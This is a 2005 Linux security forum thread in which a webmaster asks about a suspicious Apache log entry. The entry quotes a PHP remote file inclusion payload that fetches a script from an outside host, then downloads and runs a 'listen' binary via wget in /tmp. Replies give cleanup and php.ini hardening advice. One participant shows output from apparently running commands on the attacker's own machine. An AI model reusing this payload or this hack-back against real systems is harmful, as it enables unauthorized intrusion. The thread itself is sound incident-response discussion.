LinuxQuestions.org
Help answer threads with 0 replies.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 12-17-2005, 04:20 PM   #1
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Rep: Reputation: 15
access_log compromise ??


I saw a similar post yesterday, only one of my entries had a 200 status.

Can anyone tell me what they were able to accomplish, or what I need to look for?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.174.26.111/cmd.gif?&cmd=
cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
 
Old 12-17-2005, 06:53 PM   #2
neo77777
LQ Addict
 
Registered: Dec 2001
Location: Brooklyn, NY
Distribution: *NIX
Posts: 3,704

Rep: Reputation: 56
They are trying to exploit PHP code, and install an IRC bot, disable global variables and turn the safe_mode on in php.ini.
 
Old 12-17-2005, 06:59 PM   #3
neo77777
LQ Addict
 
Registered: Dec 2001
Location: Brooklyn, NY
Distribution: *NIX
Posts: 3,704

Rep: Reputation: 56
Also, look through ps and netstat output, if you were compromize the listen process will show up in your ps. Look in /tmp and see if listen binary is there. Remeber, if your webserver is running by root, the exploiter owns your system, and could've installed rootkits, etc to hide his presense - the only remedy is to unplug your system from the network, and analyze it, and most probably clean re-install.
 
Old 12-17-2005, 07:36 PM   #4
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Original Poster
Rep: Reputation: 15
The webserver is running under the apache id. And the only thing in /tmp is:
keyring-1TvKkp
mapping-root
 
Old 12-17-2005, 08:01 PM   #5
nic0
LQ Newbie
 
Registered: Dec 2005
Posts: 8

Rep: Reputation: 0
Code:
nic0@nic0:~$ ./aw 24.70.88.18 * "ps -ef|grep httpd" 3
[*] Output by 24.70.88.18:


root      6698     1  0 Nov18 ?        00:00:14 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   21918  6698  0 Dec15 ?        00:00:03 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   21923  6698  0 Dec15 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   21940  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   28790  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   24770  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   26319  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun    6914  6698  0 Dec16 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   13901  6698  0 12:22 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   24139  6698  0 17:06 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun   26687  6698  0 17:17 ?        00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun    7104  7083  0 18:05 ?        00:00:00 sh -c echo SILENTIUM;ps -ef|grep httpd;echo

nic0@nic0:~$
yeah.. he is running apache.


l337 hax0rs should make sure they're computer is secure first.

Last edited by nic0; 12-17-2005 at 09:30 PM.
 
Old 12-17-2005, 08:43 PM   #6
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Original Poster
Rep: Reputation: 15
Holy smokes. How do I make sure that can't be done to my machine?

Also, what will disabling global variables and turning safe mode on do?
 
Old 12-17-2005, 08:59 PM   #7
nic0
LQ Newbie
 
Registered: Dec 2005
Posts: 8

Rep: Reputation: 0
Disabling global variables disables people from entering their own variables into a request.
General - turning it off increases security a lot.

PHP Safe mode disables a lot of functions that remote users could exploit.
 
Old 12-17-2005, 11:24 PM   #8
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Original Poster
Rep: Reputation: 15
So in /etc/php.ini if I have:

register_globals = Off
safe_mode = On

Then this should help a bit?
 
Old 12-17-2005, 11:40 PM   #9
nic0
LQ Newbie
 
Registered: Dec 2005
Posts: 8

Rep: Reputation: 0
Yep - this will improve your PHP security a lot. I also recommend getting a security scanner and checking for common vulnerabilities.. Something like Nessus or Amap.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
phpBB Compromise chris_yumm Linux - Security 6 07-22-2005 12:54 AM
Security Compromise apache Linux - Security 16 08-07-2004 10:29 PM
Has anyone seen anything posted on the bell.ca RDNS compromise? chort Linux - Security 3 12-06-2003 07:45 AM
Segfaults in commands, possible compromise? afubini Linux - Security 2 10-15-2003 06:51 AM
OpenSSH Local Root Compromise is Possible jeremy Linux - Security 0 03-07-2002 10:37 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 10:31 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration